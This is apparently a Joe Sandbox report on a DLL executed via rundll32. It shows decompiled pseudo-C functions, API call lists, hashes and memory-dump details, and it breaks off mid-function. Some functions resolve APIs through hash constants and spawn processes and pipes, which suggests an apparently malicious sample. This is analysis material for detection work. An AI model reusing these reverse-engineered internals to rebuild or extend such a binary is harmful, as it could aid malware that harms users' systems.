Instruction ID: 40cf2675a00ff9b37053f4863b037564f167e8a7fa8b642abd638291e1f5e275
Opcode Fuzzy Hash: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
Instruction Fuzzy Hash: 7F914C32209B4996EBA6CF15E4447A9B3A1F74DBC4F09C129EA8D47754EF3CDA4AC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000431C Relevance: 16.7, APIs: 11, Instructions: 174
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0000000118000431C(void* __edx, signed long long __rax, long long __rbx, intOrPtr* __rcx, long long __rbp, signed short _a8, intOrPtr _a16, long long _a24, long long _a32) {
				void* _v40;
				void* _v56;
				void* _v72;
				void* __rdi;
				void* __rsi;
				long _t75;
				signed long long _t121;
				signed long long _t122;
				intOrPtr* _t124;
				void* _t151;
				void* _t158;
				void* _t172;

				_t162 = __rbp;
				_t121 = __rax;
				_a24 = __rbx;
				_a32 = __rbp;
				_t161 =  *0x8000d4a0;
				_t124 = __rcx;
				r14d = 0;
				WaitForSingleObject(??, ??);
				if ( *((intOrPtr*)(__rcx + 0x50)) == r14d) goto 0x8000449d;
				E0000000118000459C(0xb74c62f4, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t121 == _t172) goto 0x80004372;
				 *_t121();
				_t151 = __rcx + 0x4c;
				r8d = 0x10;
				memcpy(??, ??, ??);
				E0000000118000459C(0x176fdd38, _t121,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t121 == _t172) goto 0x800043a9;
				_t10 = _t151 + 1; // 0x2
				_t11 = _t151 + 5; // 0x6
				r8d = _t11;
				 *_t121();
				goto 0x800043ad;
				_t122 = _t121 | 0xffffffff;
				 *(__rcx + 0x10) = _t122;
				if (_t122 == 0xffffffff) goto 0x8000444d;
				E0000000118000459C(0x66454c9c, _t122,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t122 == _t172) goto 0x800043e0;
				r8d = 0x10;
				 *_t122();
				goto 0x800043e3;
				if (r14d != r14d) goto 0x80004435;
				r8d = 1;
				_a8 = r14w;
				if (E00000001180008150(_t10, 0x66454c9c, __rcx,  *(__rcx + 0x10),  *__rcx, _t158,  *0x8000d4a0, __rbp,  &_a8) != r14d) goto 0x80004442;
				SetEvent(??);
				r9d = _a8 & 0x0000ffff;
				if (E000000011800091F8(_t10, _t124, _t124,  *((intOrPtr*)(_t124 + 0x10)), _t161, _t162,  &_a8) != r14d) goto 0x80004442;
				goto 0x8000447e;
				if (GetLastError() == r14d) goto 0x80004481;
				E00000001180008308(_t122, _t124, _t124 + 0x10);
				goto 0x80004455;
				if (GetLastError() == r14d) goto 0x80004481;
				if (r14d + 1 !=  *((intOrPtr*)(_t124 + 0x44))) goto 0x80004481;
				ResetEvent(??);
				WaitForSingleObject(??, ??);
				if (WaitForSingleObject(??, ??) == 0x102) goto 0x80004386;
				goto 0x80004570;
				E0000000118000459C(0x544646d0, _t122,  *((intOrPtr*)(_t124 + 0x20)));
				if (_t122 == _t172) goto 0x800044be;
				r8d = 0x10;
				 *_t122();
				goto 0x800044c1;
				if (r14d != r14d) goto 0x80004568;
				_a16 = 0x10;
				E0000000118000459C(0xd0aed27e, _t122,  *((intOrPtr*)(_t161 + 0x30)));
				if (_t122 == _t172) goto 0x800044f2;
				 *_t122();
				goto 0x800044f5;
				if (r14d != r14d) goto 0x80004568;
				SetEvent(??);
				E0000000118000459C(0xa1aa58b7, _t122,  *((intOrPtr*)(_t161 + 0x30)));
				if (_t122 == _t172) goto 0x8000452c;
				 *_t122();
				goto 0x80004530;
				if ((_t122 | 0xffffffff) == 0xffffffff) goto 0x80004568;
				r9d = 0;
				if (E000000011800091F8(_t10, _t124, _t124, _t122 | 0xffffffff, _t161, _t162,  &_a8) == r14d) goto 0x80004504;
				E0000000118000459C(0xb74c62f4, _t122,  *((intOrPtr*)(_t161 + 0x30)));
				if (_t122 == _t172) goto 0x80004504;
				 *_t122();
				goto 0x80004504;
				_t75 = GetLastError();
				ReleaseMutex(??);
				asm("lock add dword [esi+0x38], 0xffffffff");
				return _t75;
			}

APIs

WaitForSingleObject.KERNEL32 ref: 0000000180004349
memcpy.NTDLL ref: 0000000180004381
SetEvent.KERNEL32 ref: 0000000180004410
GetLastError.KERNEL32 ref: 0000000180004435
ResetEvent.KERNEL32 ref: 0000000180004465
WaitForSingleObject.KERNEL32 ref: 0000000180004478
WaitForSingleObject.KERNEL32 ref: 0000000180004487
SetEvent.KERNEL32 ref: 00000001800044FE
GetLastError.KERNEL32 ref: 0000000180004568
ReleaseMutex.KERNEL32 ref: 0000000180004574

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorEventLastObjectSingleWait$MutexReleaseResetmemcpy
String ID:
API String ID: 1434584367-0
Opcode ID: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
Instruction ID: da870e4c5b3f8ba762a5b16c43bcb008f7342bdb94fea84615746d30c68c72b5
Opcode Fuzzy Hash: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
Instruction Fuzzy Hash: 817173B2210A0882EBA2DF65D4503ED3361F78CBE4F148612EE6A5B7D5CE34CA898705

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007444 Relevance: 16.6, APIs: 11, Instructions: 146memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,00000000,0000000180006222), ref: 0000000180007489
_snprintf.NTDLL ref: 00000001800074BB
lstrlenA.KERNEL32 ref: 00000001800074D7
HeapAlloc.KERNEL32 ref: 000000018000750F
_snprintf.NTDLL ref: 0000000180007540
HeapAlloc.KERNEL32 ref: 000000018000754F
_snprintf.NTDLL ref: 00000001800075B7
memcpy.NTDLL ref: 00000001800075CB
memcpy.NTDLL ref: 00000001800075E2
_snprintf.NTDLL ref: 0000000180007620
HeapFree.KERNEL32 ref: 0000000180007653

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _snprintf$Heap$AllocTimememcpy$FileFreeSystemlstrlen
String ID:
API String ID: 1448584724-0
Opcode ID: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
Instruction ID: 43bd3c41a0e216f1fe2d256970a36843f92bdaad392a56b89b43ab90d53a1bd0
Opcode Fuzzy Hash: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
Instruction Fuzzy Hash: 5851AB36B14A4886EB92CF16E8047DA77A5F78CBC4F558121EE0D83755EF38DA1AC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006754 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81processmemoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0000000180006786

Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D

CreateProcessW.KERNEL32 ref: 00000001800067F7
WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
TerminateProcess.KERNEL32 ref: 0000000180006844
CloseHandle.KERNEL32 ref: 000000018000684F
CloseHandle.KERNEL32 ref: 000000018000685A
GetLastError.KERNEL32 ref: 0000000180006862
HeapFree.KERNEL32 ref: 0000000180006877

Strings

h, xrefs: 00000001800067A1

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CloseHandleHeapProcess$AllocCreateErrorFreeLastMultipleObjectsTerminateWaitmemset
String ID: h
API String ID: 3316326719-2439710439
Opcode ID: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
Instruction ID: 097b2738b8004f5ee40f8b7a1758c839ecbf0a38091e65ea8e5fbb9dadc2f9be
Opcode Fuzzy Hash: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
Instruction Fuzzy Hash: CF318E32704B8986EB95CB56E84479AB3A1F78CBD0F14C135EA9D83B64DF78C548CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000970C Relevance: 15.2, APIs: 12, Instructions: 177
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E0000000118000970C(void* __ebx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, signed long long __r11) {
				void* __rdi;
				signed int _t56;
				int _t61;
				intOrPtr _t77;
				intOrPtr _t78;
				struct _CRITICAL_SECTION* _t121;
				long long _t124;
				intOrPtr* _t150;
				struct _CRITICAL_SECTION* _t154;
				long long _t161;
				intOrPtr* _t162;
				void* _t165;
				void* _t166;
				void* _t168;
				signed long long _t177;
				struct _CRITICAL_SECTION* _t179;
				struct _CRITICAL_SECTION* _t183;
				void* _t186;
				void* _t189;
				void* _t190;

				_t177 = __r11;
				_t168 = __r8;
				_t126 = __rbx;
				 *((long long*)(_t165 + 0x10)) = __rbx;
				 *((long long*)(_t165 + 0x18)) = _t161;
				 *((long long*)(_t165 + 0x20)) = __rsi;
				_t166 = _t165 - 0x60;
				_t159 =  *__rcx;
				r14d = r8d;
				_t190 = __rdx;
				_t162 = __rcx;
				 *((long long*)(_t166 + 0x58)) =  *__rcx;
				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x80009758;
				E000000011800045E8(__ebx,  *0x8000d4a0, __rbx, __rcx,  *__rcx, __rcx, _t189, _t186);
				EnterCriticalSection(_t183);
				asm("lock add dword [esi+0x40], 0x1");
				LeaveCriticalSection(_t179);
				r11d =  *(_t162 + 0x70) & 0x000000ff;
				_t56 =  *(_t162 + 0x50) & 0x000000ff;
				if (r11d - _t56 >= 0) goto 0x800097e8;
				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x48)) + _t177 * 8));
				_t77 =  *_t150;
				if (_t77 == dil) goto 0x800097aa;
				if (_t77 == 0x2f) goto 0x800097a5;
				_t78 =  *((intOrPtr*)(_t150 + 1));
				if (_t78 != dil) goto 0x80009796;
				if (_t78 != dil) goto 0x800097ad;
				_t121 = _t154;
				if (_t121 == _t154) goto 0x800097c5;
				if ( *((char*)(_t121 - 1)) != 0x3a) goto 0x800097c5;
				if ( *((char*)(_t121 + 1)) != 0x2f) goto 0x800097c5;
				E00000001180001C00(0, _t126, _t177 + _t150, _t154, _t159, _t162);
				if (_t121 == _t154) goto 0x800097e8;
				 *(_t166 + 0x90) = 0 | _t56 + 0x00000002 == 0x00000008;
				asm("lock add dword [esi+0x40], 0xffffffff");
				if (_t121 == _t154) goto 0x8000996c;
				r9d = 0;
				r8d = r14d;
				 *((long long*)(_t166 + 0x38)) = _t166 + 0x40;
				 *((long long*)(_t166 + 0x30)) = _t166 + 0x48;
				_t24 = _t166 + 0x50; // 0x32
				_t124 = _t24;
				 *((long long*)(_t166 + 0x28)) = _t124;
				 *((intOrPtr*)(_t166 + 0x20)) = 0;
				if (E00000001180006108(_t126, _t162, _t190, _t168) != 0) goto 0x8000995c;
				_t187 =  *_t162;
				EnterCriticalSection(_t154);
				asm("lock inc ecx");
				LeaveCriticalSection(??);
				if ( *((intOrPtr*)(_t162 + 0x18)) == _t154) goto 0x8000986b;
				E00000001180001C00(0, _t126,  *((intOrPtr*)(_t162 + 0x18)), _t154, _t159, _t162);
				goto 0x80009873;
				asm("lock inc ecx");
				if ( *(_t166 + 0x90) == _t154) goto 0x8000993c;
				r14d = lstrlenA(??);
				_t61 = lstrlenA(??);
				_t32 = _t187 + 2; // 0x2
				r15d = _t61;
				E00000001180001C00(_t124 + _t32,  *(_t166 + 0x90), _t121, _t154, _t159, _t162);
				if (_t124 == _t154) goto 0x8000992e;
				_t33 = _t190 + 1; // 0x1
				r8d = _t33;
				 *((char*)( *_t162 + _t124)) = 0x2f;
				memcpy(??, ??, ??);
				dil =  *(_t166 + 0x90) != 0;
				 *((intOrPtr*)(_t166 + 0x38)) = 2;
				 *((long long*)(_t166 + 0x30)) =  *((intOrPtr*)(_t166 + 0xb8));
				 *((long long*)(_t166 + 0x28)) =  *((intOrPtr*)(_t166 + 0xb0));
				 *((intOrPtr*)(_t166 + 0x20)) =  *((intOrPtr*)(_t166 + 0x40));
				if (E000000011800088B4(_t56 + 2,  *(_t166 + 0x90),  *((intOrPtr*)(_t166 + 0x58)), _t124,  *((intOrPtr*)(_t166 + 0xb0)), _t159, _t124,  *((intOrPtr*)(_t166 + 0x50)),  *((intOrPtr*)(_t166 + 0x48))) != 0x10d2) goto 0x80009920;
				asm("sbb eax, eax");
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0x80009971;
				return 8;
			}

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,0000000180005069), ref: 000000018000975C
LeaveCriticalSection.KERNEL32(?,0000000180005069), ref: 000000018000976B
EnterCriticalSection.KERNEL32(?,0000000180005069), ref: 0000000180009840
LeaveCriticalSection.KERNEL32(?,0000000180005069), ref: 0000000180009850
lstrlenA.KERNEL32(?,0000000180005069), ref: 0000000180009885
lstrlenA.KERNEL32(?,0000000180005069), ref: 0000000180009891
memcpy.NTDLL(?,0000000180005069), ref: 00000001800098C0

Part of subcall function 00000001800045E8: GetSystemTimeAsFileTime.KERNEL32 ref: 000000018000461B
Part of subcall function 00000001800045E8: LeaveCriticalSection.KERNEL32 ref: 0000000180004653

Part of subcall function 00000001800088B4: memset.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180009910,?,0000000180005069), ref: 00000001800088F9

HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009928
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009936
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009946
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009956
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009964

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalFreeHeapSection$Leave$EnterTimelstrlen$FileSystemmemcpymemset
String ID:
API String ID: 4119546182-0
Opcode ID: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
Instruction ID: 44ed652dd4a090d7685ee9479cd2374acead57c43adb5283d017da8f701a6da5
Opcode Fuzzy Hash: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
Instruction Fuzzy Hash: F5719436608A8886EBA1CF66E8043DAB7A1F78CBD0F458125FE9D83755DF38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002F24 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 112memorypipeCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 0000000180002F58
memset.NTDLL ref: 0000000180002F7E
CreatePipe.KERNEL32 ref: 0000000180002FB4
GetLastError.KERNEL32 ref: 0000000180002FBE

Strings

.RK, xrefs: 000000018000304E

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AllocCreateErrorHeapLastPipememset
String ID: .RK
API String ID: 2695650488-3354657194
Opcode ID: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
Instruction ID: 378f6602c2b1250aa9488984ecc26cdba5ebabec116acb0dc11713ee51ebb5a5
Opcode Fuzzy Hash: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
Instruction Fuzzy Hash: 4E41AD71314B8982EB93CB66E4613E977A4FB8CBC4F048021EA4987B95DF38D64CCB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005600 Relevance: 10.6, APIs: 7, Instructions: 81memorystringtimeCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 0000000180005634
HeapAlloc.KERNEL32 ref: 0000000180005648
GetSystemTime.KERNEL32 ref: 000000018000565F
_snprintf.NTDLL ref: 00000001800056B6
EnterCriticalSection.KERNEL32 ref: 00000001800056C2
LeaveCriticalSection.KERNEL32 ref: 000000018000571B
HeapFree.KERNEL32 ref: 0000000180005729

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterFreeLeaveSystemTime_snprintflstrlen
String ID:
API String ID: 2518601019-0
Opcode ID: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
Instruction ID: d9d6c815191b5ef41651c0c787a8a8ca67448b671f5da5a3966f0d0395a17d9c
Opcode Fuzzy Hash: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
Instruction Fuzzy Hash: C9313B36208B8486D795CF12F8447AAB761F789BD5F448026EE8A43B24EF3CD549CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001000 Relevance: 10.6, APIs: 7, Instructions: 79memoryfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 000000018000104A
GetFileSize.KERNEL32 ref: 000000018000105E
HeapAlloc.KERNEL32 ref: 000000018000107A
ReadFile.KERNEL32 ref: 000000018000109F
GetLastError.KERNEL32 ref: 00000001800010C8
CloseHandle.KERNEL32 ref: 00000001800010D9
HeapFree.KERNEL32 ref: 00000001800010F0

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: File$Heap$AllocCloseCreateErrorFreeHandleLastReadSize
String ID:
API String ID: 4260168601-0
Opcode ID: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
Instruction ID: dbc3ca4fbdf92ddb3d6ab0fb3fd3743db26333d8f93616b96f69221312f2bdc0
Opcode Fuzzy Hash: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
Instruction Fuzzy Hash: 3431413120478986F7A2CB56A8447DAB6D0B74CBE5F44C325EEA9477D4DF78C68E8B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001D98 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75processmemoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0000000180001DD1

Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D

memcpy.NTDLL ref: 0000000180001E66
CreateProcessW.KERNEL32 ref: 0000000180001EA4
GetLastError.KERNEL32 ref: 0000000180001EAE
HeapFree.KERNEL32 ref: 0000000180001EBE

Strings

h, xrefs: 0000000180001E1C

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$AllocCreateErrorFreeLastProcessmemcpymemset
String ID: h
API String ID: 1962595928-2439710439
Opcode ID: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
Instruction ID: 4743b7abae4fc84edbe905cfc6942fba1d9a030ece9545f382f76fd41ef8ffd2
Opcode Fuzzy Hash: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
Instruction Fuzzy Hash: 5E312F32204A89DAE7A1DF16F8447CAB7A4F7887D4F458125EA8D83B54DF78C64ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007A7C Relevance: 10.5, APIs: 7, Instructions: 34COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32 ref: 0000000180007A9F
CloseHandle.KERNEL32 ref: 0000000180007AA9
CloseHandle.KERNEL32 ref: 0000000180007AB3
CloseHandle.KERNEL32 ref: 0000000180007AC2
CloseHandle.KERNEL32 ref: 0000000180007ACC
CloseHandle.KERNEL32 ref: 0000000180007ADB
CloseHandle.KERNEL32 ref: 0000000180007AE5

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CloseHandle$ProcessTerminate
String ID:
API String ID: 1541851893-0
Opcode ID: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
Instruction ID: 6aea6e80272aa285d695e7919669a58fbc0d4d182d54ab24a0e74719d0bdf862
Opcode Fuzzy Hash: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
Instruction Fuzzy Hash: 27017D35701A49C1EB96DF66D8547A97361FB8CFD5F05C021AE1E82725DE28C64DC701

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800020DC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 138
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E000000011800020DC(long long* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi) {
				intOrPtr _t43;
				intOrPtr _t44;
				signed int _t45;
				long long* _t81;
				void* _t82;
				void* _t83;
				long long* _t84;
				void* _t104;
				long long _t108;
				void* _t111;
				void* _t112;
				void* _t121;
				int _t123;
				int _t126;
				void* _t129;
				CHAR* _t131;

				_t81 = __rax;
				 *((long long*)(_t111 + 8)) = __rbx;
				 *((long long*)(_t111 + 0x18)) = _t108;
				 *((long long*)(_t111 + 0x20)) = __rsi;
				_t112 = _t111 - 0x1c0;
				_t109 =  *0x8000d4a0;
				r14d = 0;
				 *(_t112 + 0x1f8) = lstrlenA(_t131);
				memset(_t129, _t126, _t123);
				_t6 = _t104 + 1; // 0x1
				_t7 = _t129 + 2; // 0x2
				r11d = _t7;
				r8d = _t6;
				 *__rdx = r11w;
				HeapAlloc(_t104, ??);
				if (__rax == 0) goto 0x80002287;
				memcpy(??, ??, ??);
				_t43 =  *((intOrPtr*)(__rax));
				if (_t43 == dil) goto 0x80002192;
				if (_t43 == 0x3a) goto 0x8000218d;
				_t44 =  *((intOrPtr*)(__rax + 1));
				if (_t44 != dil) goto 0x8000217d;
				if (_t44 != dil) goto 0x80002195;
				_t121 = _t104;
				if (_t121 == _t104) goto 0x800021d9;
				_t8 = _t121 + 1; // 0x1
				 *_t121 = dil;
				if (_t8 == _t104) goto 0x800021d9;
				if (E000000011800038F8(_t8, __rcx, _t112 + 0x1f8) == 0) goto 0x80002279;
				_t45 =  *(_t112 + 0x1f8) & 0x0000ffff;
				asm("ror cx, 0x8");
				 *(__rdx + 2) = _t45;
				if (_t45 == 0) goto 0x80002279;
				E0000000118000459C(0x25fff021, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t81 == _t104) goto 0x800021f5;
				 *_t81();
				goto 0x800021f8;
				_t82 = _t104;
				if (_t82 != _t104) goto 0x8000224d;
				E0000000118000459C(0xb27f4910, _t82,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t82 == _t104) goto 0x8000221e;
				 *_t82();
				goto 0x80002220;
				if (0 != 0) goto 0x80002249;
				r14d = 1;
				E0000000118000459C(0x25fff021, _t82,  *((intOrPtr*)(_t109 + 0x30)));
				if (_t82 == _t104) goto 0x80002241;
				 *_t82();
				goto 0x80002244;
				_t83 = _t104;
				if (_t83 != _t104) goto 0x8000224d;
				goto 0x8000225f;
				_t84 =  *((intOrPtr*)(_t83 + 0x18));
				 *((intOrPtr*)(__rdx + 4)) =  *((intOrPtr*)( *_t84));
				if (r14d == 0) goto 0x80002279;
				E0000000118000459C(0x9cb92d3f, _t84,  *((intOrPtr*)(_t109 + 0x30)));
				if (_t84 == _t104) goto 0x80002279;
				 *_t84();
				HeapFree(??, ??, ??);
				return 1;
			}

APIs

lstrlenA.KERNEL32 ref: 0000000180002117
memset.NTDLL ref: 0000000180002136
HeapAlloc.KERNEL32 ref: 0000000180002151
memcpy.NTDLL ref: 000000018000216C
HeapFree.KERNEL32 ref: 0000000180002281

Strings

lJu, xrefs: 0000000180002129

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$AllocFreelstrlenmemcpymemset
String ID: lJu
API String ID: 1735321128-4100297759
Opcode ID: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
Instruction ID: f04020e7afacaa342a0f02f17fd00bf906b29f7f5bb121ef27d08f96d68cd7ee
Opcode Fuzzy Hash: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
Instruction Fuzzy Hash: D7510C32304A9C96EAE3DBA299143EA7792F78CBC4F59C021FE5947755DD39CE898300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005DF8 Relevance: 9.1, APIs: 6, Instructions: 131
memoryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00000001180005DF8(long long __rbx, intOrPtr* __rcx, void* __r8) {
				signed long long _t88;
				long _t111;
				void* _t114;
				long _t117;
				void* _t121;
				void* _t122;
				long _t130;
				void* _t133;

				 *((long long*)(_t121 + 0x18)) = __rbx;
				_t122 = _t121 - 0x30;
				_t88 =  *0x8000d4a0;
				r13d = 0;
				 *(__rcx + 0x5c) = r13d;
				 *(_t122 + 0x68) = r13d;
				if ( *((intOrPtr*)(__rcx + 0x58)) != r13d) goto 0x80005fbc;
				 *(_t122 + 0x60) = 4;
